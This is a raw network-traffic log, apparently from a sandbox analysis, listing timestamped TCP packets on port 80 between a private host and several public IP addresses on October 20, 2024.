Oct 20, 2024 18:42:22.302118063 CEST	49908	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:22.307096958 CEST	80	49908	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:22.307159901 CEST	49908	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:22.307254076 CEST	49908	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:22.307272911 CEST	49908	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:22.312143087 CEST	80	49908	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:22.312153101 CEST	80	49908	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:22.480981112 CEST	80	49902	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:22.531678915 CEST	49902	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:22.817209959 CEST	49911	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:22.821984053 CEST	80	49911	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:22.822042942 CEST	49911	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:22.822174072 CEST	49911	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:22.822199106 CEST	49911	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:22.826957941 CEST	80	49911	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:22.827033997 CEST	80	49911	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:23.978856087 CEST	80	49908	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:23.979324102 CEST	80	49908	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:23.979413033 CEST	80	49908	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:23.979450941 CEST	49908	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:23.979547977 CEST	49908	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:23.980539083 CEST	80	49908	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:23.980932951 CEST	49908	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:23.981081009 CEST	80	49911	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:23.981681108 CEST	80	49908	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:23.981714964 CEST	49911	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:23.981729984 CEST	80	49911	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:23.981782913 CEST	49911	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:23.981786013 CEST	49908	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:23.986042023 CEST	80	49908	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:23.986043930 CEST	49911	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:23.990883112 CEST	80	49911	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:24.102725029 CEST	49914	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:24.107846975 CEST	80	49914	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:24.107973099 CEST	49914	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:24.111047029 CEST	49915	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:24.111646891 CEST	49914	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:24.111716986 CEST	49914	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:24.115957975 CEST	80	49915	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:24.116080046 CEST	49915	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:24.116595984 CEST	80	49914	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:24.116605997 CEST	80	49914	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:24.117562056 CEST	49915	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:24.117650986 CEST	49915	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:24.122505903 CEST	80	49915	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:24.122515917 CEST	80	49915	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:24.953707933 CEST	49915	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:25.050640106 CEST	80	49914	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:25.050715923 CEST	49914	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:25.050746918 CEST	49914	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:25.055510998 CEST	80	49914	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:25.106020927 CEST	49921	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:25.110848904 CEST	80	49921	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:25.110930920 CEST	49921	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:25.111047029 CEST	49921	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:25.111078978 CEST	49921	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:25.115849972 CEST	80	49921	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:25.115859985 CEST	80	49921	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:25.297544956 CEST	49922	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:25.302583933 CEST	80	49922	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:25.302660942 CEST	49922	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:25.302773952 CEST	49922	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:25.302807093 CEST	49922	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:25.307738066 CEST	80	49922	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:25.307746887 CEST	80	49922	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:26.061395884 CEST	80	49921	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:26.061489105 CEST	49921	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:26.061489105 CEST	49921	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:26.066448927 CEST	80	49921	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:26.152856112 CEST	49927	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:26.157748938 CEST	80	49927	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:26.157813072 CEST	49927	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:26.165186882 CEST	49927	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:26.165203094 CEST	49927	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:26.170042038 CEST	80	49927	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:26.170118093 CEST	80	49927	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:26.251068115 CEST	80	49922	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:26.251138926 CEST	49922	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:26.251190901 CEST	49922	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:26.256084919 CEST	80	49922	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:26.442289114 CEST	49929	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:26.447102070 CEST	80	49929	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:26.447218895 CEST	49929	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:26.447299004 CEST	49929	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:26.447299004 CEST	49929	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:26.452159882 CEST	80	49929	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:26.452169895 CEST	80	49929	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:27.118849039 CEST	80	49927	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:27.118912935 CEST	49927	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:27.118949890 CEST	49927	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:27.123749018 CEST	80	49927	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:27.176934958 CEST	49934	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:27.181814909 CEST	80	49934	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:27.181891918 CEST	49934	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:27.182028055 CEST	49934	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:27.182063103 CEST	49934	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:27.186882019 CEST	80	49934	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:27.186897039 CEST	80	49934	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:27.375639915 CEST	80	49929	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:27.375741005 CEST	49929	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:27.375777006 CEST	49929	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:27.380994081 CEST	80	49929	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:27.662595987 CEST	49936	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:27.668225050 CEST	80	49936	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:27.668306112 CEST	49936	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:27.668659925 CEST	49936	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:27.668680906 CEST	49936	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:27.674716949 CEST	80	49936	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:27.675936937 CEST	80	49936	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:28.149441004 CEST	80	49934	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:28.152776957 CEST	49934	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:28.152842045 CEST	49934	80	192.168.2.4	35.164.78.200
Oct 20, 2024 18:42:28.157674074 CEST	80	49934	35.164.78.200	192.168.2.4
Oct 20, 2024 18:42:28.200833082 CEST	49940	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:28.205771923 CEST	80	49940	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:28.208151102 CEST	49940	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:28.208437920 CEST	49940	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:28.208472967 CEST	49940	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:28.213360071 CEST	80	49940	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:28.213372946 CEST	80	49940	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:29.101598978 CEST	80	49940	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:29.101669073 CEST	49940	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:29.101877928 CEST	49940	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:29.106702089 CEST	80	49940	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:29.143084049 CEST	49944	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:29.148020029 CEST	80	49944	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:29.148747921 CEST	49944	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:29.148860931 CEST	49944	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:29.148885965 CEST	49944	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:29.153714895 CEST	80	49944	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:29.153731108 CEST	80	49944	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:29.222516060 CEST	80	49936	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:29.222596884 CEST	49936	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:29.225557089 CEST	49936	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:29.230488062 CEST	80	49936	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:29.263542891 CEST	49945	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:29.268445015 CEST	80	49945	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:29.268753052 CEST	49945	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:29.268930912 CEST	49945	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:29.271924973 CEST	49945	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:29.273739100 CEST	80	49945	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:29.276782990 CEST	80	49945	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:30.539570093 CEST	80	49944	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:30.539629936 CEST	49944	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:30.539664030 CEST	49944	80	192.168.2.4	3.94.10.34
Oct 20, 2024 18:42:30.544641972 CEST	80	49944	3.94.10.34	192.168.2.4
Oct 20, 2024 18:42:30.591850996 CEST	49952	80	192.168.2.4	165.160.13.20
Oct 20, 2024 18:42:30.596770048 CEST	80	49952	165.160.13.20	192.168.2.4
Oct 20, 2024 18:42:30.596865892 CEST	49952	80	192.168.2.4	165.160.13.20
Oct 20, 2024 18:42:30.597018957 CEST	49952	80	192.168.2.4	165.160.13.20
Oct 20, 2024 18:42:30.597018957 CEST	49952	80	192.168.2.4	165.160.13.20
Oct 20, 2024 18:42:30.602664948 CEST	80	49952	165.160.13.20	192.168.2.4
Oct 20, 2024 18:42:30.602694988 CEST	80	49952	165.160.13.20	192.168.2.4
Oct 20, 2024 18:42:30.828082085 CEST	80	49945	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:30.828139067 CEST	49945	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:30.828171015 CEST	49945	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:30.833086014 CEST	80	49945	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:31.127398968 CEST	49954	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:31.132431984 CEST	80	49954	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:31.132508993 CEST	49954	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:31.132653952 CEST	49954	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:31.132685900 CEST	49954	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:31.137736082 CEST	80	49954	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:31.137751102 CEST	80	49954	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:31.523525953 CEST	80	49952	165.160.13.20	192.168.2.4
Oct 20, 2024 18:42:31.575660944 CEST	49952	80	192.168.2.4	165.160.13.20
Oct 20, 2024 18:42:31.575923920 CEST	49957	80	192.168.2.4	165.160.13.20
Oct 20, 2024 18:42:31.580815077 CEST	80	49957	165.160.13.20	192.168.2.4
Oct 20, 2024 18:42:31.581182003 CEST	49957	80	192.168.2.4	165.160.13.20
Oct 20, 2024 18:42:31.581242085 CEST	80	49952	165.160.13.20	192.168.2.4
Oct 20, 2024 18:42:31.581311941 CEST	49952	80	192.168.2.4	165.160.13.20
Oct 20, 2024 18:42:31.581407070 CEST	49957	80	192.168.2.4	165.160.13.20
Oct 20, 2024 18:42:31.581432104 CEST	49957	80	192.168.2.4	165.160.13.20
Oct 20, 2024 18:42:31.586201906 CEST	80	49957	165.160.13.20	192.168.2.4
Oct 20, 2024 18:42:31.586210966 CEST	80	49957	165.160.13.20	192.168.2.4
Oct 20, 2024 18:42:32.046242952 CEST	80	49954	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:32.046317101 CEST	49954	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:32.072283030 CEST	49954	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:32.077303886 CEST	80	49954	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:32.320039988 CEST	49960	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:32.324883938 CEST	80	49960	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:32.327426910 CEST	49960	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:32.328960896 CEST	49960	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:32.328960896 CEST	49960	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:32.334388018 CEST	80	49960	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:32.334574938 CEST	80	49960	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:32.606940985 CEST	80	49957	165.160.13.20	192.168.2.4
Oct 20, 2024 18:42:32.644212008 CEST	49963	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:32.650336981 CEST	80	49963	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:32.652781010 CEST	49963	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:32.652921915 CEST	49963	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:32.652976036 CEST	49963	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:32.656677008 CEST	49957	80	192.168.2.4	165.160.13.20
Oct 20, 2024 18:42:32.659993887 CEST	80	49963	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:32.660003901 CEST	80	49963	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:32.954441071 CEST	49960	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:33.913923979 CEST	80	49960	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:33.914001942 CEST	49960	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:33.914544106 CEST	80	49960	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:33.914638042 CEST	49960	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:33.914904118 CEST	80	49963	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:33.914947987 CEST	80	49960	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:33.914973974 CEST	49963	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:33.914989948 CEST	49960	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:33.915033102 CEST	49963	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:33.915173054 CEST	80	49963	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:33.915231943 CEST	49963	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:33.924588919 CEST	80	49963	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:33.982764006 CEST	49966	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:33.987963915 CEST	80	49966	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:33.988049030 CEST	49966	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:33.988209963 CEST	49966	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:33.988229036 CEST	49966	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:33.993110895 CEST	80	49966	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:33.993220091 CEST	80	49966	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:34.341371059 CEST	49970	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:34.346259117 CEST	80	49970	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:34.346344948 CEST	49970	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:34.346446037 CEST	49970	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:34.346471071 CEST	49970	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:34.351300955 CEST	80	49970	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:34.351522923 CEST	80	49970	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:34.936088085 CEST	80	49966	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:34.936744928 CEST	49966	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:34.975444078 CEST	49966	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:34.980469942 CEST	80	49966	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:35.099266052 CEST	49888	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:35.099518061 CEST	49972	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:35.104355097 CEST	80	49972	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:35.104429007 CEST	49972	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:35.104660034 CEST	80	49888	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:35.104733944 CEST	49888	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:35.108237982 CEST	49972	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:35.108266115 CEST	49972	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:35.113403082 CEST	80	49972	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:35.113518000 CEST	80	49972	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:35.246764898 CEST	80	49970	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:35.248744011 CEST	49970	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:35.249272108 CEST	49970	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:35.254121065 CEST	80	49970	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:35.340648890 CEST	49974	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:35.345799923 CEST	80	49974	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:35.348762035 CEST	49974	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:35.348906994 CEST	49974	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:35.348921061 CEST	49974	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:35.353818893 CEST	80	49974	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:35.354051113 CEST	80	49974	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:35.980192900 CEST	80	49972	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:36.038500071 CEST	49972	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:36.046876907 CEST	49972	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:36.047135115 CEST	49976	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:36.052056074 CEST	80	49976	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:36.052263021 CEST	80	49972	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:36.052344084 CEST	49972	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:36.052354097 CEST	49976	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:36.052491903 CEST	49976	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:36.052501917 CEST	49976	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:36.057409048 CEST	80	49976	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:36.057596922 CEST	80	49976	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:36.249758005 CEST	80	49974	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:36.250904083 CEST	49974	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:36.250960112 CEST	49974	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:36.256270885 CEST	80	49974	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:36.796565056 CEST	49981	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:36.801500082 CEST	80	49981	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:36.801618099 CEST	49981	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:36.801860094 CEST	49981	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:36.801945925 CEST	49981	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:36.807044029 CEST	80	49981	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:36.807080030 CEST	80	49981	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:36.907641888 CEST	80	49976	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:36.952141047 CEST	49976	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:36.962558031 CEST	49982	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:36.967535973 CEST	80	49982	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:36.967603922 CEST	49982	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:36.967818022 CEST	49982	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:36.967818022 CEST	49982	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:36.973447084 CEST	80	49982	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:36.973479986 CEST	80	49982	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:37.891369104 CEST	80	49982	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:37.891450882 CEST	49982	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:37.891519070 CEST	49982	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:37.896450996 CEST	80	49982	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:37.929948092 CEST	49988	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:37.934967995 CEST	80	49988	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:37.935046911 CEST	49988	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:37.935146093 CEST	49988	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:37.935163021 CEST	49988	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:37.940279961 CEST	80	49988	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:37.940310001 CEST	80	49988	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:38.330841064 CEST	80	49981	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:38.330933094 CEST	49981	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:38.333714008 CEST	49981	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:38.339823008 CEST	80	49981	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:38.366391897 CEST	49989	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:38.371376991 CEST	80	49989	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:38.371469975 CEST	49989	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:38.371686935 CEST	49989	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:38.371745110 CEST	49989	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:38.376622915 CEST	80	49989	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:38.376745939 CEST	80	49989	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:39.876163006 CEST	80	49988	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:39.892999887 CEST	49988	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:39.897360086 CEST	80	49989	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:39.897591114 CEST	49989	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:39.897654057 CEST	49989	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:39.898171902 CEST	80	49988	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:39.899039030 CEST	49988	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:39.902471066 CEST	80	49989	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:39.907761097 CEST	49997	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:39.912566900 CEST	80	49997	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:39.914293051 CEST	49997	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:39.914558887 CEST	49997	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:39.914558887 CEST	49997	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:39.919393063 CEST	80	49997	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:39.919606924 CEST	80	49997	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:40.400074005 CEST	50001	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:40.405113935 CEST	80	50001	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:40.405316114 CEST	50001	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:40.405591965 CEST	50001	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:40.405628920 CEST	50001	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:40.410664082 CEST	80	50001	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:40.410685062 CEST	80	50001	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:40.865170956 CEST	80	49997	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:40.865318060 CEST	49997	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:40.865318060 CEST	49997	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:40.870192051 CEST	80	49997	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:40.905817032 CEST	50002	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:40.910751104 CEST	80	50002	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:40.910823107 CEST	50002	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:40.911015987 CEST	50002	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:40.911072969 CEST	50002	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:40.916203022 CEST	80	50002	54.244.188.177	192.168.2.4
